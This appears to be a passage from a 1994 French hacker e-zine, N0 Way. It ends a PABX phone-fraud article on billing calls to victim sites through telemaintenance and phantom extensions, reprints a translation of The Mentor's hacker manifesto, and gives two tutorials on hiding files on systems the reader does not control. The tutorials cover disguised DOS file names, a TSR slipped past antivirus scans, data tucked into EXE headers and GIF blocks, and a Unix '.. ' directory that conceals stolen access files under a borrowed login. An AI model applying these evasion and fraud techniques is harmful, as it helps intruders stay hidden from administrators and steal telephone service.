communication vers l'exterieur.
* recuperation des fonctionnalité d'un poste de direction par un code
et son mot de passe. Cette fonction permet a partir de n'importe quel
poste de la société de récupérer le 19 en affectant le ticket de
taxation au poste directeur.
C) Piratage par telemaintenance.
[ce qui suit est ma description des schemas:
Fonction de télémaintenance:
* Controle de qualité d'une ligne : permet d'appeler n'importe quel
numéro.
* Programmation d'un poste fantome puis renvoi. ]
a) il est possible d'appeler un PABX et de se faire rappeler
simultanement. Le but est de contrìler l'établissement de la
liaison et de mesurer sa qualité:
- en affaiblissement
- en paradiaphonie
- en reverberation
Au lieu de se faire rappeler sur le site de contrìle, un
technicien peut en profiter pour appeler un correspondant à
l'étranger ou des serveurs minitel.
Les taxes seront donc affecté au site controlé!
b) Il est possible par telemaintenance de déclarer par programmation un
poste dit fantome dans un PABX distant.
Il existe dans la machine mais il n'est physiquement pas présent sur
le site.
D) Piratage d'un auxiliaire d'un PABX.
Ce type de piratage est possible par le biais des options installées
sur un autocommutateur téléphonique.
Sont concernés:
* serveurs vocaux
* messageries vocales
* les opérateurs automatiques
Moyen de protection: Sur incident, appel non abouti il est souhaitable
de réorienter les appels vers la standardiste. Cette précaution
empàche un correspondant exterieur de surnuméroter pour rappeler un
autre poste à travers le PABX.
E) Piratage par une base TSF.
[ bof, je tape pas ca:
On passe dans les couloirs de la société avec un téléphone sans fil
et on essaye d'accrocher une base ! ]
5¯)
A) acces aux locaux:
[ resumé: - salle PABX fermée
- acces controlés
- que des techniciens habilités.
- mm ch pr la salle d'exploit.
- gaines techniques fermees
- cabine de sous repartition controlée et surveillée
- chemins de cable visibles cerclés et couverts!
B) protec des infos.
Enfermé dans des armoires:
- derniere programmation
- support annuaire technique
- la composition des tetes PTT
- la composition du systeme ne doit pas etre divulgué surtout si des
auxiliaires sont raccordés derriere le PABX.
Attention:
Les microordinateurs envoyés en réparation, peuvent contenir des
informations sensibles:
- annuaire technique complet
- annuaire extern
- liste des numéros abrégés
- liste des techniciens habilités.
- liste des mots de passe
- la taxation contenant tous les numéros appelés.
C) Destruction des supports obsolete:
[ en bref, on passe tout au broyeur et DELETE et FORMAT ne sont pas
effectifs ! ]
D) Sauvegarde
6¯) Les moyens de contrìle:
A) La taxation telephonique:
[ schéma montrant une imprimante connectée au modem de maintenance du
PABX avec consoles d'observ du trafic, de taxation et console systeme PABX
ainsi qu'une messagerie vocale.
]
Doit permettre un controle sur une periode paramétrable pour les appels
émis par poste, service, direction.
* a l'etranger
* en province
* en local
B) Observ. du trafic:
permet de reperer les lignes modem du PABX appelées en dehors des
heures ouvrables.
[ ***CONCLUSION*** ***IMPORTANTE*** DONC :
SCANNEZ LA NUIT MAIS ------> *** UTILISEZ LE JOUR *** ]
Tres utile en cas de piratage du PABX pour determiner les faisceaux
utilisés pour entrer et ressortir a travers le PABX et ses auxiliaires.
Afin de faciliter ce repérage, il est possible d'extraire les appels
ressortantss dans la meme minute que les appels quii arrivent sur le
PABX.
Cette possibilité facilite grandement l'analyse si des temporisations
n'ont pas été programées.
Les tickets des appels émis par un PABX et non compris par le PC
d'observation de trafic doivent etre stockés pour traitement ultérieur.
Ne pas oublier que la puissance de traitement d'un systeme périphérique de
taxation ou d'observation téléphonique est liée à la richesse des
informations délivrées par le PABX d'un constructeur.
Exemple: si le PABX n'a que des compteurs pour les emissions et les
receptions d'appels, il sera impossible de faire un horodatage et de
determiner les heures de pointes.
--
Fin de la premiäre partie
--
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.5
\/\La Conscience d'un hacker/\/
par
+++The Mentor+++
Ecrit le 8 Janvier 1986
Traduit par NeurAlien le 8 septembre 1994.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Un autre s'est fait prendre aujourd'hui, c'est partout dans les
journaux. "Scandale: Un adolescent arreté pour crime informatique",
"Arrestation d'un 'hacker' apräs le piratage d'une banque"...
Satanés gosses, tous les màmes.
Mais avez vous, dans votre psychologie en trois piece et votre profil
technocratique de 1950, un jour pensé à regarder le monde derriere les yeux
d'un hacker? Ne vous etes vous jamais demandé ce qui l'avait fait agir,
quelles forces l'avaient modelé?
Je suis un hacker, entrez dans mon monde...
Le mien est un monde qui commence avec l'école... Je suis plus
astucieux que la pluspart des autres enfants, les conneries qu'ils m'apprennent
me lassent...
Je suis au colläge ou au lycée. J'ai écouté les professeurs expliquer
pour la quizieme fois comment réduire une fraction. Je l'ai compris.
"Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tàte"
Satané gosses. Il l'a certainnement copié. Tous les màmes.
J'ai fait une découverte aujourd'hui. J'ai trouvé un ordinateur.
Attends une minute, c'est cool. Ca fait ce que je veux. Si ca fait une
erreur, c'est parce que je me suis planté.
Pas parce qu'il ne m'aime pas...
Ni parce qu'il se sent menacé par moi...
Ni parce qu'il pense que je suis petit filoux...
Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas àtre là...
Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les màmes.
Et alors c'est arrivé... une porte s'est ouverte sur le monde... Se
précipitant a travers la ligne téléphonique comme de l'héroine dans les veines
d'un accro, une impulsion electronique est envoyée, on recherche un refuge à
l'incompetence quotidienne... un serveur est trouvé.
Vous vous repetez que nous sommes tous pareils... On a été nourri à la
petite cuillere de bouffe pour bébé à l'école quand on avait faim d'un steak...
Les fragments de viande que l'on nous a laissé étaient pré-machés et sans gout.
On a été dominé par des sadiques ou ignoré par des apathiques. Les seuls qui
avaient des choses à nous apprendre trouvärent des éläves volontaires, mais
ceux ci sont comme des gouttes dans le desert.
C'est notre monde maintenant... Le monde de l'éléctron et de
l'interrupteur, la beauté du baud. Nous utilisons un service déja existant,
sans payer ce qui pourrait àtre bon marché si ce n'était pas la propriété
de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et
vous nous appelez criminels. Nous recherchons la connaissance... et vous nous
appelez criminels. Nous existons sans couleur de peau, sans nationalité, sans
dogme religieux... et vous nous appelez criminels.
Vous construisez des bombes atomiques, vous financez les guerres,
vous ne punissez pas les patrons de la mafia aux riches avocats,
vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous
faire croire que c'est pour notre propre bien àtre, et nous sommes encore des
criminels.
Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon
crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur
apparence.
Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez
jamais.
Je suis un hacker, et ceci est mon manifeste. Vous pouvez arreter cet
individu, mais vous ne pouvez pas tous nous arreter...
apräs tout, nous sommes tous les màmes.
+++The Mentor+++
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.6
…ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕª
∫ Data dissimulation techniques: ∫
∫ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ∫
∫ Hiding your data in ∫
∫ a Restricted and Patrolled ∫
∫ District of CyberSpace. ∫
∫ ------------------------------ ∫
∫ Written by Arscene ∫
∫ for N0Way ∫
»ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕº
I) Intro & Thanks & Disclaimer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dans la, heum, discipline, qui est la notre il arrive souvent que
nous ayions a dissimuler une certaine quantité de Data sur un
systeme que nous visitions, ou qui possede des resources auquelles
nous n'avons pas access, et generalement dont il ne profite pas
pleinement. Il nous arrive aussi d'avoir a communiquer dans un
environnement peu sur et controlé par des individus paranoiaques et
megalomanes. C'est pour ces deux raisons que j'ai ecrit ce file.
Il s'adresse a tous, et j'espere qu'il vous sera utile (Que j'ai
pas passé des nuits blanches pour rien, quoi).
Remerciements/greets/good_karma a NeurAlien, Omega et O'Connell
pour etre qui ils sont.
GreetZ a tous les lecteurs de N0Way. N'oubliez pas que l'avenir;
c'est vous. Et que vous etes defini par vos actions, et non votre
passé.
This file also dedicated to Mr Toubon for his open mindedness and
his efforts towards harmonious internationalisation. Also to Mr
Pasqua for his efforts to preserve peace at all cost and his
unswaying belief in the principles of democracy, justice, and
freedom.
Bon, je suis sur que NeurAlien vas nous faire une superbe
Disclaimer qui couvre tout, mais j'aimerais rajouter la mienne:
De ce texte complet, je n'ais ecrit et pensé que ces trois lignes.
Dans ces trois lignes, une et une seule est un mensonge.
Avant-hier, j'ai pensé voir un OVNI.
Faites moi du mail sur ce que vous pensez de ce Disclaimer, et vos
idées pour faire mieux.
II) Cacher un file dans le OS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bon, d'abord les principes de base. Si vous etes sur un systeme 'étranger'
(dont vous n'avez pas le controle complet), il arrive que vous vouliez
posseder quelques files (fichiers), sans que les autres users, ou meme le
Supervisor, ne le sache. Il faut donc les cacher.
1) Les attributs de systeme:
La, on pense tout de suite aux attributs speciaux de fichiers (Caché ou
Systeme, sous MS-DOS). Mais, si ces attributs font partie du systeme ils
sont tres connus, et bon nombre de programmes peuvent les modifier, ou les
ignorent tout simplement. Ils servent en general a proteger l'utilisateur
de lui meme, en evitant par exemple qu'il n'efface des fichiers systemes.
Par exemple: Crééz un fichier DOS puis faites soit ATTRIB +H ou ATTRIB +S
dessus, et allez dans le file manager de Windows (Vous ne l'utilisez peut
etre pas souvent, mais le proprietaire de systeme si). Allez sur le
drive/dir ou est votre fichier caché. Normalement vous ne le voyez pas.
Vous ne pouvez pas non plus l'effacer.
Maintenant allez dans Affichage/Par type de fichiers. Cliquez sur
'Visualiser les fichiers systemes/cachés'. En revenant a l'ecran principal
vous devriez voir votre fichier, mais en plus il aura un point
d'exclamation rouge a coté de son nom, et il n'est plus tres discret
maintenant.
De meme, si vous avez LapLink 3 (recommandé), vous avez surement remarqué
qu'il affiche les fichiers normaux en gris-DOS standard, mais les fichiers
cachés ou systemes sont affichés en Blanc (High intensity) avec un '*'
devant leur nom. Ideal pour se faire reperer.
2) Le choix:
Les attributs du systeme peuvent donc soit bien dissimuler le fichier,
soit le rendre tres evident. Il y a donc un choix a faire. Pensez vous que
la/les personnes a qui vous voulez dissimuler le fichier seront assez
intelligentes pour cliquer sur le bouton ? (C'est une vraie question, pas
une question rhetorique). La reponse par default, dans mon cas, est Oui. Je
prefere ne pas cacher mes files et utiliser d'autres options.
3) Tout en haut de l'arbre:
Comme un object caché dans un arbre, un file caché profond en haut de
l'arbre est plus dur a reperer que si vous le laissiez dans la racine. En
regle generale il ne faut rien mettre dans la racine, et preferer au moins
2 niveaux de profondeure. Voici un exemple:
Pour une raison qui m'est propre je devais charger un TSR sur une PC en
reseau Novell. Il fallait une ligne dans l'autoexec, et un endroit ou
mettre le fichier sur le disque dur. Cette machine etait frequement utilisé
par le SUPERVISOR (on se demande ce que faisait le TSR, hum ;-)) et
l'AUTOEXEC.BAT lanáait un antivirus resident qui scannait la racine
de C: au demarage. Les noms des fichiers sur C:\ s'affichant
pendant le scan. J'ai donc mis le fichier dans C:\DOS. Ainsi il
n'etait pas remarqué par le scan, et la ligne dans l'autoexec ne
paraissait pas suspecte car l'autoexec.bat sert justement a charger
des programmes du repertoire DOS. Cet exemple me permet d'ajouter
qu'il faut toujours essayer de placer un fichier parmi ses
semblables, du moins exterieurement (j'y reviendrait en 4).
Un autre exemple: J'avais un fichier de +4Mo a dissimuler sur un poste en
local, le temps que je puisse amener de quoi le backup et le ramener chez
moi. Je l'ai mis dans C:\EXCEL\EXEMPLES\AUTRE, il y a de cela au moins 6
mois. A derniäre verification il y etait encore. Peu de gens s'aventurent
haut dans un arbre, surtout s'il parait conforme. Une petite note quand
meme: N'en faites pas trop. Il ne faut pas que le chemin soit sensiblement
plus long que la moyenne sur le disque, car un backup ou un TREE pourrait
le reperer aisement.
Pour clore cette partie il me faut reserver une mention speciale a nos
amis de chez M$, et plus particulierement le repertoire WINDOWS\SYSTEM.
Celui-ci existe sur la grande majorité des machines, peut etre meme la
votre. Combien d'entre vous savent combien de fichiers ils ont dans ce
repertoire, et ce que fait chaque fichier ? En gros, on peut TOUT fourrer
dans ce repertoire, si ce n'est ni trop gros ni trop voyant. Personne ne
s'en rendra compte.
4) "A rose by any other name would smell as sweet"
Pour ceux qui n'auraient pas compris ma citation de Shakespeare, Juliet
dit qu'une rose, meme si on changait son nom, aurait quand meme la (bonne)
odeure d'une rose. Mais un file ne sent pas, d'ou l'interet de changer son
nom pour le dissimuler (Logique suspecte).
Un nom qui fasse temporaire ( *.$$$, ~*.TMP, etc) est assez bon pour une
courte periode, mais un sys/user intelligent risque de l'effacer au bout
d'un moment. Un nom inventé est bon, de preference un nom qui ne soit pas
comprehensible, de sorte a faire fichier systeme. Explication: En general
un user va essayer de lire un file du nom README.NOW, il lira probablement
le file WHATEVER.TXT, peut etre pas WHATEVER.DAT et surement pas PR4)Q567
sans extension.
Un nom de ce type est bon, mais ce n'est pas ce qui se fait de mieux. Le
nom devrait s'integrer a son environnement. Regardez se qui existe deja
dans les alentours. Par exemple j'ai mis deux fichiers (HACK et VIEW pour
ceux que cela interresse) dans le ROOT d'un drive ou il existait MENU1.OLD
et MENU2.OLD. Simplement en les appelent MENU3.OLD et MENU4.OLD ils sont
restes 'invisibles' pendant plus d'un mois (puis je les ais enlevé).
CONFIG.OLD (ou .CPS ou .B~K) et la meme chose pour AUTOEXEC font de bon
depos temporaires. Pour une plus longue echeance essayer TD451.DRV dans
\WINDOWS\SYSTEM ou un truc du genre.
5) Conclusion (de part I)
Petite conclusion rapide. Les trois regles d'or pour planquer un file
sont:
- Le mettre ou en utilisation normale un user ne le verait meme pas.
- Que son nom s'integre a son environnement.
- Choisir un nom/extension que l'user ne penserait pas, en marche normale
a lire/ouvrir/lancer/etc.
Et en, heu, regle d'argent:
- Autant que possible, le crypter.
6) PS et PPS
PS: Si vous cryptez le file il ne faut PAS que cela soit apparent, par
exemple PGP met '----- BEGIN PGP MESSAGE -----' (ou un truc du
genre) au debut de ce qu'il crypte. Si un sys/user voit cela il
risque fort de le delete immediatement.
PPS: Dans la serie Revenge/Annoy si vous voulez simplement irriter le
sys/user dans ce cas faites tout le contraire de ce que dit ce file. Un
fichier de 8Mo du nom de SECRET.COD, OCCULT.SEX, VIRUS.XXX dans le ROOT,
completement crypté (du garbage au hasard) avec en premiere ligne 'JF-DES
Crypted block. Checksum: 834A4C12' risque grandement d'amuser un sys/user,
surtout si il en retrouve des variantes subtiles partout sur son disque :-)
III) Cacher un file dans un autre
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Une technique encore plus subtile, et de par la meme meilleure, est de
cacher un file directement dans un autre. Le file 'host' devrait etre un
fichier anodin, qui a droit de residence legitime sur le systeme. Cela peut
permettre de dissimuler encore plus efficacement un file sur un systeme,
mais egalement (et probablement encore plus important) est que cette
technique permet de créer un chemin sur entre 2 personnes a travers une
zone non-sure du CyberSpace. Exemple: Dans les interets de la securité
nationale et du peuple, un gouvernement debonnaire a rendu l'echange
d'informations cryptés illégales. Non respet de cette loi vous
fera deporté en Antarctique. Mais, CyberPunk que vous etes, vous
devez envoyer vos C0deZ a quelqu'un. Vous ecrivez votre message,
le cryptez. Puis vous digitalisez une photo de votre maison,
inserez votre file dans la photo (en remplaáant le gresillement
(l'aglomeration urbaine derriäre chez vous en low-res) du fond par
votre file crypté), puis vous U/L le tout a votre ami. Ce que je
viens de decrire est fiction, mais montre un peu les possibilités
de cette technique, qui commence d'ailleurs a faire du bruit
(Remarquez l'allusion).
[ OUh ouh Arscene, ce n'est plus Fiction !!! Cypherella des cypherpunks l'a
fait sur Mac deja et j'ai eu des echos comme quoi la meme chose existe sur PC
et Unix pour intégrer du code PGP a du JPEG et du GIF. ++NeurAlien]
1) Un peu de pratique
Voici quelque endroits, sur PC, ou un file pourrait etre caché:
- Dans un TXT: Un fichier TXT se finit par un CR, LF (qui font aller a la
ligne) et un marqueur de fin de fichier. En Hex, cela donne 0D 0A 1A.
Ajoutez ces 3 bytes a la fin d'un fichier TXT, puis ajoutez du text apräs,
et ni TYPE ni EDIT n'afficheront ce nouveau text. Voici en detail:
COPY CON FIRST.TXT
>Essai de text XXX^Z
(1 fichier ecrit)
[Editez ce fichier et remplacez les 3 X respectivement par 0D, 0A et 1A]
COPY CON TWO.TXT
>Text secret^Z
(1 fichier ecrit)
COPY FIRST.TXT + TWO.TXT /b FINAL.TXT
TYPE FINAL.TXT
Essai de text
Si vous ouvrez a nouveau FINAL.TXT dans votre editeur Hex vous verrez les
2 lignes. Cette technique n'est pas terrible en pratique (car un bon
editeur ASCII ou traitement de texte fera apparaitre tout le texte) mais
sert bien de demonstration
- Dans un EXE: Tout EXE commence par un header d'une longeure variable de
bytes, et avec l'utilisation rependue de compresseurs d'EXE le seul vrai
moyen de voir si un header est valide est de lancer l'EXE. Pour inclure ce
que vous voulez dans le header il suffit d'allonger sa taille. Cette taille
s'exprime en paragraphes (16 bytes = 1 pararaph), est un WORD et ce trouve
au 5äme WORD du fichier (10äme et 11äme byte). Apräs avoir ajouté la
longeure de votre fichier / 16 ( + un peu pour etre sur ) au header il
suffit d'inclure votre fichier a la fin de ce header. L'EXE devrait
toujours fonctionner sans probleme. Si vous compez automatiser l'operation,
il est bon d'inclure aussi la longeure du fichier en bytes et l'ancienne
longueure du header.
- Dans un GIF: Un GIF est formé de plusieures blocs. Un bloc commence par
soit par un ',', (une virgule quoi), si c'est une image, par ';' si c'est
la fin du fichier (bon, ok, c'est pas vraiment un bloc), ou par '!' si
c'est une extension. La, cela devient interressant. Une extension peut
etre n'importe quoi, un commentaire par exemple, en general un
viewer de GIF reconnait certaines extension, et ignore tout simplement les
valeures qu'il ne connait pas. D'ou l'idée de se faire un bloc 'Secret
info'.
Bon, comme aucun d'entre vous ne paye sa comm pour D/L N0Way, je peut sans
crainte vous balancer ces extraits des DOC officielles:
La premiäre concerne les extensions GIF en general:
GIF Extension Blocks are packaged in a manner similar to that used
by the raster data though not compressed. The basic structure is:
7 6 5 4 3 2 1 0 Byte #
+---------------+
|0 0 1 0 0 0 0 1| 1 '!' - GIF Extension Block Introducer
+---------------+
| function code | 2 Extension function code (0 to 255)
+---------------+ ---+
| byte count | |
+---------------+ |
: : +-- Repeated as many times as necessary
|func data bytes| |
: : |
+---------------+ ---+
. . . . . .
+---------------+
|0 0 0 0 0 0 0 0| zero byte count (terminates block)
+---------------+
A GIF Extension Block may immediately preceed any Image Descriptor
or occur before the GIF Terminator.
All GIF decoders must be able to recognize the existence of GIF
Extension Blocks and read past them if unable to process the function
code.
La seconde concerne le bloc d'extension particulier qui nous
interresse:
26. Application Extension.
a. Description. The Application Extension contains application-specific
information; it conforms with the extension block syntax, as described
below, and its block label is 0xFF.
b. Required Version. 89a.
c. Syntax.
7 6 5 4 3 2 1 0 Field Name Type
+---------------+
0 | | Extension Introducer ['!'] Byte
+---------------+
1 | | Extension Label [0xFF] Byte
+---------------+
+---------------+
0 | | Block Size [11] Byte
+---------------+
1 | |
+- -+
2 | |
+- -+
3 | | Application Identifier 8 Bytes
+- -+
4 | |
+- -+
5 | |
+- -+
6 | |
+- -+
7 | |
+- -+
8 | |
+---------------+
9 | |
+- -+
10 | | Appl. Authentication Code 3 Bytes
+- -+
11 | |
+---------------+
+===============+
| |
| | Application Data Data Sub-blocks
| |
| |
+===============+
+---------------+
0 | | Block Terminator Byte
+---------------+
i) Extension Introducer - Defines this block as an extension. This
field contains the fixed value 0x21 ['!' en ASCII].
ii) Application Extension Label - Identifies the block as an
Application Extension. This field contains the fixed value 0xFF.
iii) Block Size - Number of bytes in this extension block,
following the Block Size field, up to but not including the
beginning of the Application Data. This field contains the fixed
value 11.
iv) Application Identifier - Sequence of eight printable ASCII
characters used to identify the application owning the Application
Extension.
v) Application Authentication Code - Sequence of three bytes used
to authenticate the Application Identifier. An Application program
may use an algorithm to compute a binary code that uniquely
identifies it as the application owning the Application Extension.
d. Extensions and Scope. This block does not have scope. This block
cannot be modified by any extension.
e. Recommendation. None.
Bon, j'espere que tout le monde a compris :-)
Ce qu'il faut faire devient plus clair:
Trouvez un endroit ou mettre notre bloc, par exemple la fin du
fichier ( seek(file, -1, SEEK_END); en C. La fin d'un GIF est
marqué par un ';' ). Il suffit d'y inserer un '!', le code disant
que ceci est une Application Extension (0xFF), le numero 11, puis
votre ID specifique (Sur Compu$serve en forum PICS il y a une liste
rassemblent tous le Application ID deja utilisés, liste geré par
Larry Wood). Puis vous mettez votre code de 3 bytes, sorte de
signature pour verifier que ce n'est pas un faux bloc, puis
finalement vous balancez votre file, sans trop vous soucier de la
compression (qui selon la doc doit etre RLE), car de toute faáon il
sera decodé par un soft maison, et pas par le viewer de GIF.
Verifiez quand meme qu'aucun byte ne vaut 0, car ce byte marque la
fin du bloc. Voila, une methode discrete et aisé. Merci
Compu$serve.
2) Finalement...
Au fait, j'ai traité certaines methodes, et j'espere que vous
pensez deja a d'autres (elles sont illimités). Mais, je n'ais pas
parlé de celle mentionné dans l'intro, du Crypted text dans du
graphic. Ben, heu, a vous de la faire :-) Serieusement j'etudie la
question, et j'ai vu certains programmes sur BBS qui pretendait
faire exactement cela. Peut-etre un article ulterieure (enfin,
j'ai dit peut-etre)...
X) Bon, ben la le file est fini. J'espere que vous avez apprecié,
car ce fut interessant a ecrire. En cas ou vous auriez deja
oublié, me llamo Arscene, et je prends data/info/mail/insultes/louanges/
demandes_en_marriage/pots_de_vin/prix_pulitzer/etc en bal Arscene sur
The 0NE, le RTC EFZ, ou sur A-D. Si besoin, voici ma clé:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi501fkAAAEEAMJm9gMhAGYaOnjYFzTVWxAX17rDX4tUjRG7wD6u5BgyOWFL
gtyx3p8NQJCtjZOuRGOvSRFdm0l/fYY3qWbaXFOSRAY516ihc0OZurYaTROoIk3u
/PuCUC9cHJmnFX6LpHj8MUtEpk1A19dM5UYmKQekDcSavCPv/xRorln5z03NAAUR
tAdBcnNjZW5l
=IosC
-----END PGP PUBLIC KEY BLOCK-----
Contactez moi en BAL avant de m'envoyer quelque chose de
confidentiel pour verifier que vous avez bien ma VRAIE clé.
---------------------------------------------------------------------
-%!% N0 Way %!%-
Volume I, Numéro 3, Partie 3.7
w____OO____w
Playing hide 'n' seek in CyberSpace
by ++NeurAlien
/\/OO\/\
Hey, je recois a l'instant l'article tres kewl d'Arscene et je me dis
"Helluvabitch... wud B kewl 2 make de zame dingz 4 yunixzz zyztemz !"
(ce qui veut dire Mr Allg00d :
"ta mere en Slip bleu devant le Prisu' chausse du 2 !" Ouhahaha )
Alors, voila, je vais vous montrer comment jouer au gros chien avec son
admin de systeme Unix en lui cachant des trucs n'importe ou. Ceci est
utilisable sans programme spéciaux ni quoi: vous avez juste a connaitre la
métthode. Et ensuite je vais vous montrer comment vous amuser enormement avec
les nerfs des admins de serveurs FTP sur le reseau Internet par le biais des
Incomings directories.
Ce N-Phile est dedicace tout specialement à Arscene qui s'applique
toujours à nous fournir des articles qui relevent le niveau de N0 Way...
(Ca va plaire, la distribution de NW 3 est assurée à grande échelle cette fois
ci ! :))
Je tiens a remercier aussi les quelques personnes qui m'ont enseignées
l'art du hacking sous Unix, le Department of Defense aux USA sans lequel je
n'aurais jamais eu acces a l'Internet (ni vous d'ailleur), les chiens dans la
rue pour m'avoir souvent permis de me défouler, les "experts en sécurité" pour
m'avoir souvent fait rire et enfin la brasserie Valstar SA pour m'avoir souvent
dépanné ;))
Ou est ce que je me planque en local?
====================================
Well... Sous Unix c'est pas comme sous DOS, les attributs Caches et
systemes, hum, yen a pas trop. Par contre unix a un gros avantage:
il accepte BEAUCOUP BEAUCOUP de caracteres dans ses noms de fichier.
Par exemple, il accepte les espaces dans ses noms de fichier.
Ainsi on peut facilement dissimuler créer des fichier qui seront difficilement
accessibles.
On peut créer un fichier "sale admin" par exemple mais bon, ca se remarque !
Exemple 1:
======> Script started on Thu Sep 15 02:16:15 1994
DaubeNet-tmp {101} ls -al
total 2
drwx------ 2 fred emprunte 512 Sep 15 02:16 .
drwx------ 11 fred emprunte 512 Sep 15 02:16 ..
-rw------- 1 fred emprunte 0 Sep 15 02:16 ex1
DaubeNet-tmp {102} cat >"sale admin"
Haha, gros nain, tu sais meme pas effacer un fichier pfff....
^D
DaubeNet-tmp {103} exit
======> Script done on Thu Sep 15 02:17:36 1994
Alors la, l'admin quand il se pointe il voie:
======> Script started on Thu Sep 15 02:19:04 1994
DaubeNet-tmp {101} ls -al
total 3
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
DaubeNet-tmp {102} exit
======> Script done on Thu Sep 15 02:19:18 1994
Ehehe, voila... Et la l'admin il aura beau tenter:
======> Script started on Thu Sep 15 02:19:22 1994
root# ls -al
total 3
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
root# rm sale admin
rm: sale: No such file or directory.
rm: admin: No such file or directory.
root# echo ARghhhhhh
ARghhhhhh
root# exit
======> Script done on Thu Sep 15 02:19:45 1994
Bref, pour l'effacer, en fait tout ce qu'il suffit de faire c'est:
======> Script started on Thu Sep 15 02:20:57 1994
DaubeNet-tmp {101} ls -al
total 3
drwx------ 2 fred emprunte 512 Sep 15 02:17 .
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
-rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
DaubeNet-tmp {102} rm "sale admin"
DaubeNet-tmp {103} ls -al
total 2
drwx------ 2 fred emprunte 512 Sep 15 02:21 .
drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
DaubeNet-tmp {104} exit
======> Script done on Thu Sep 15 02:21:11 1994
Ca c'est marrant pour faire un peu chier l'admin mais quand vous voulez
reellement planquer des trucs, il faut la jouer plus fine. Si par exemple
root.axs et milnet.dialup sont tres importants pour vous et que vous empruntez
le login de quelqu'un, vous pouvez les cacher tres simplement.
Exemple 2:
======> Script started on Thu Sep 15 02:25:11 1994
DaubeNet-fred {101} ls -al
total 46
drwx------ 12 fred emprunte 512 Sep 15 02:24 .
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
[voici nos fichiers]
DaubeNet-fred {102} ll milnet.dialup root.axs
1 -rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
2 -rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
[On crée le directory fantome]
DaubeNet-fred {103} mkdir ".. "
[On met nos fichiers dedans]
DaubeNet-fred {104} mv milnet.dialup root.axs ".. "
[OOOooOOoOoOps, ca fait drole quand meme deux directory ".." !!!]
DaubeNet-fred {105} ls -al
total 44
drwx------ 13 fred emprunte 512 Sep 15 02:25 .
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
drwx------ 2 fred emprunte 512 Sep 15 02:25 ..
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
-rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
-rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
-rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
-rwx------ 1 fred emprunte 207 Sep 3 1993 .login
-rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
-rwx------ 1 fred emprunte 83 Sep 3 1993 .profile
-rwx------ 1 fred emprunte 7908 Sep 3 1993 .twmrc
-rwx------ 1 fred emprunte 866 Sep 3 1993 .xinitrc
drwx------ 2 fred emprunte 512 Jun 12 22:31 Mail
drwx------ 7 fred emprunte 512 Jun 20 01:40 src
drwx------ 2 fred emprunte 512 Sep 15 02:21 tmp
drwx------ 5 fred emprunte 512 Jul 4 14:45 tools
DaubeNet-fred {106} cd ".. "
DaubeNet-fred {107} ls -al
total 5
drwx------ 2 fred emprunte 512 Sep 15 02:25 .
drwx------ 13 fred emprunte 512 Sep 15 02:25 ..
-rw------- 1 fred emprunte 260 Sep 15 02:24 milnet.dialup
-rw------- 1 fred emprunte 1040 Sep 15 02:24 root.axs
DaubeNet-fred {108} cd ..
DaubeNet-fred {109} mv ".. \milnet.dialup" .
DaubeNet-fred {110} ls -al
total 45
drwx------ 13 fred emprunte 512 Sep 15 02:26 .
drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
drwx------ 2 fred emprunte 512 Sep 15 02:26 ..
-rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
